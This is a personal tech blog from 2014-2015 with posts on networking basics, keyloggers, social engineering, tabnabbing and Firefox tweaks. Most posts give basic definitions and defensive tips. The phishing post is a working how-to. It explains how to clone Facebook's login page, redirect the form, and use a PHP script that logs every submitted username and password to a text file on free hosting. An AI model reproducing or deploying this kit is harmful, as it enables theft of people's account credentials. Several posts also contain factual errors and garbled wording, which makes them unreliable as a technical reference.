Monday, 23 February 2015

CLOUD SECURITY SCANNER

Google introduced new tool cloud security scanner. If you are a programmer or interested in hacking  so this tool help you a lot, web application vulnerability scanner tool . If you are developer you can check your application vulnerability or your risk.

Saturday, 20 September 2014

HOW TO INSTALL WHATSAPP ON PC/LAPTOP

How to install whatsapp on your computer or laptop ?




















First of all download bluestackoffline installer software then install bluestack offline installer on your pc after that open it and you will get whatsapp application there thats it.....................................


Tuesday, 8 July 2014

TRANSPORT LAYER PROTCOL

Transport layer is responsible to make a packets and how data is transmitted in tcp environment. Transport layer recieves data from its upper layer and make packets of data and forward it to the network layer it perform flow control, reliability, sequence number or acknowledgements. Transport layer is a L4 layer of OSI Model which make segmentation..

TCP  ( Transmission control protocol)

TCP is a connection oriented protocol. It make packets of your data and  provide sequencing and give you acknowledgement of your data  and error checking or resend your data until its  received to the destination.

UDP (User data gram Protocol)

It is a connectionless protocol which is not provide you acknowledgement . Its only send your data to the destination without any acknowledgment. Voice communication are UDP

Sunday, 6 July 2014

FACEBOOK ACCOUNT BACKUP

Yes you can take backup of your facebook account like your photos , videos, contact, post and etc just visit on https://register.facebook.com/editaccount.php 

just click on that link and download all your data from facebook...


ETHICAL HACKING

FOOTPRINTING

Foot printing is a first step which hacker has perform before hacking any website or network or accounts. Actually foot printing is a method or technique to gather your information . If hacker wants to hack your computer or account the first step he perform is foot printing first he gather all your information like your Operating system like which operating system you are using , what antivirus you are using or it is updated or not windows is patched or not so all these information first hacker gather before hacking any computer or accounts that's why it is recommended to you never provide your personal information on internet or telephone

MAC ADDRESS

As i told you in my previous tutorial that every computer or device connected on the network or internet has a unique identification number known as IP addresses same like  mac address is also required. Every Computer or laptop have a Physical Identification number which is mac (media access control address) it assigned to network interfaces for communication over the network or internet . Mac address are assigned by the manufacturer of your NIC (Network interface controller) mean when you purchased any computer or laptop from any bran they provide you a mac address or physical address for identification it is a unique number it represent like 08-00-29-00-58-E2, you can check your mac address just open CMD or type ipconfig/all

Saturday, 5 July 2014

KEYLOGGER

Key logger is a software or application which has the capability to record every information you type from your keyboard . Hacker installed key logger on your computer without your knowledge and once it installed on your PC it sends all the information which you have typed  from your keyboard to the hacker in log file . We can also say its a surveillance tool which record your information without your knowledge . Mostly it installed on your PC when you don't  have updated Antivirus or window or  you have download free games, movies and files or unknown person email attachment.

NAME OF KEYLOGGERS

Sniper Spy 
Andra max Key logger
Refog key logger



RECOMMENDATION :- ALWAYS USED UPDATED ANTIVIRUS OR WINDOWS NEVER DOWNLOAD UNKNOWN PERSON EMAIL ATTACHMENT WITHOUT SCANNING . DOWNLOAD SOFTWARE OR GAMES ONLY FROM TRUSTED WEBSITES

HOW TO BECOME AN ETHICAL HACKER

Ethical Hacker is a person work with permission of the company or organization  to protect the network or application from hackers he help to increase the security . Security is ever evolving process . No network or computer is 100 percent secure.






To become an ethical hacker you required lot of skills in computer programming and networking , ethical hacker needs hands on security skills. Being an ethical hacker its your responsibility to perform penetration testing and check all the security or vulnerabilities in network or in application. Being an ethical hacker you should have the programming knowledge like C, C++, HTML., php. python, sql, although you must have the knowledge in networking like:-

1. Routing knowledge (Routing Protocols)
2.OSI Model , TCP/IP
3.ACL (Access control list)
4.Firewalls, IPS, (Intrusion Preventation system), IDS (Intrusion detection system)
5.Microsoft Server 2008 or 2010
6.Linux or (Backtrack open source)

                                                           KNOWLEDGE REQUIRED

INFORMATION GATHERING  

 SOCIAL ENGINEERING ATTACK

PHISHING ATTACK

DNS POISONING (ADVANCED PHISHING) 

SNIFFERS

PHYSICAL ACCESS

SESSION HIJACKING (MAN IN THE MIDDLE ATTACK)

SQL INJECTION

XXS ATTACK

BRUTE FORCING ATTACK (PASSWORD GUESSING)

DOS ATTACK

DDOS ATTACK  

WINDOWS HACKING

LINUX HACKING

CRYPTOGRAPHY

WIRELESS HACKING TECHNIQUE (WEP OR WAP CRACK TOOLS)

TROJANS AND BACKDOORS

PROXY SERVER AND ETC...


Hacker is a very intelligent person who have very good knowledge in all above programming and networking or to become an ethical hacker you must have all the knowledge which i have mention above . We will learn all these thing one by one in our upcoming lecture or tutorials.

SOCIAL ENGINNERING

Social engineering is a method or technique to get into the network or a system. Social engineering is used to obtain your personal information like your name date of birth bank account details and email accounts details or your network details etc. Social engineering commonly done by the telephone or internet to get the sensitive information or to get them to do something which is against the security policies of company or organization. In social engineering attack you get the telephone call or email where your personal information ask or if you provide your information on telephone or internet you will get the victim.


NEVER RESPOND TO ANY PHONE CALL OR EMAIL WHERE YOUR PERSONAL INFORMATION ASK. ALWAYS VERIFY THE WEBSITE BEFORE ENTERING YOUR PERSONAL INFORMATION

For more details on social engineering watch my video tutorial

Friday, 4 July 2014

TAB NAPPING

Tab napping is a new advanced method of phishing it is also used to steal your personal information like username and passwords, bank details or password and etc. Tab napping is done when you have multiples tab open like you are watching videos on you tube or chatting on Facebook and booking tickets etc, its something script which you enter into your web site or blog and when the victim visit on your website or blog or click on your link now when you go to the other tab You will be redirect to the phishing page which hacker has created and it will ask you to enter the user name and password like you were chatting on the Facebook and also watching videos on you tube now you will be redirect again to Facebook page and it will ask you to enter your username and password again and when you enter your user name and password hacker will get all your information because it was a phishing page.




DO NOT CLICK ANY LINK BEFORE VERIFYING IT OR DO NOT OPEN MULTIPLE TABS WHILE ENTERING YOUR BANK DETAILS OR INTERNET SHOPPING.

HIJACT RACT ANDROID MALWARE

HIJACK RACT ia  new android malware which comprise accounts of mobile banking users
 It can give remote control of the infected device to hackers. It can steal your personal information like SMS or messages and also read your contacts ,

HOW HACKERS HACK USING PHIHING ATTACK

As i already told you about phishing in my video tutorial that how hackers hack your email account using phishing . Phishing is fraudulent scam where hacker sends you a link of phishing website to you and when you double click on that link it will take you to the fake website which hacker has created . Phishing is used to steal your personal information like your email account password, your bank accounts details or passwords and etc depending upon the hacker what he wants. Phishing is a Social Engineering attack where hacker create a fake login page of the website or send it you and ask you to open that website or  when you open that website or enter your personal information on the website  hacker gets that information because you have not entered the information on the real page or website , you have entered the information on hacker websites or login page which he has uploaded on the web hosting account or web server so he will get all your information which you have been entered.


THIS VIDEO IS ONLY FOR EDUCATIONAL PURPOSES FREE IT EDUCATION WORLD IS NOT MOTIVATING  YOU OR ENCOURAGING YOU FOR HACKING  . HACKING IS ILLEGAL OR CRIME .


How hackers create a phishing page ?

1. First You need a  a web hosting account where you can upload all you files . You can upload your files on a free webhosting account you can create a free web hosting account like my2gb.com or byethost.com or etc.

2. After creating a web hosting account now you need a phishing page or PHP file to create a fake page of the website you just open that website like if you want to create a fake page of facebook just open the facebook website and right click on the website or click on "view page source" option now you will see all the source code you can see in picture below

Now you can search for action="https://www.facebook.com/login.php

Now Change it to action="facebook.php and save the file with name as facebook.htm

3 Nor you need php code just copy the code and save in into note pad as facebook.php

 <?php
header (‘https://www.facebook.com’);
$handle = fopen(“facebook.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?> 

Copy the above code and paste it into notepad and save it as facebook.php
Now everything is done you have successfully link your code with facebook page now upload both the files facebook.php and facebook.htm on your web hosting account.

TO DETECT THE PHISHING PAGE OR PHISHING WEBSITE YOU CAN GO TO HTTP://WWW.PHISHTANK.COM
FORE MORE DETAILS ON PHISHING YOU CAN WATCH MY VIDEO TUTORIAL  HOW HACKERS HACK YOUR EMAIL ACCOUNT WITH PHISHING
http://www.freeiteducationworld.blogspot.in/2014/05/how-to-hack-facebook-account-part-1_6.html 

Tuesday, 1 July 2014

OSI MODEL

Open System Interconnection (OSI) Model was Introduced in 1984. It has seven Layer which help computer to communicate with other computer over the Network. Its read from Top to bottom







7. Application Layer : It is responsible for message formatting like when we open internet explore we work on application layer
6. Presentation Layer:- It help to decrypt or encrypt the message or compression, decompression

5. Session Layer : It allows authentication or permission to make session restoration

4.Transport Layer:- End-to End Control error or make divide data into packets.

3.Network Layer :- It allows network addressing, ip addressing or routing , forward packets.
2.Data Link Layer : It detects error or flow control on physical link
1. Physical Layer :  Physical medium (cable or Lan card) method of representing bit, like hubs, or physical cable.



HOW TO RECOVER DELTE DATA FROM HARD DRIVE

When you delete you hard drive data or format your hard drive your data has not deleted permanently you can recover your HD Data with easily. There are lot of software available  in the market which can recover your data and Stellar Phoenix Windows Data Recovery Tool is the best tool to recover your HD Data . You can buy Sellar Phoenix Windows Data Recovery Tool
Stellar Phoenix Data recover


INCREASE INTERNET SPEED BY USING FIREFOX

If you are using Firefox browser so you can increase it speed by manually just type about:config in the address bar where you enter the website.

Now Search for Network http.pipelining.maxrequest . You can also enter this value in filter option now  double click on it and Change it value from 32 to now search network.http.proxy.pipelining double click on it  and make its value to true .








ENJOY THE SPEED......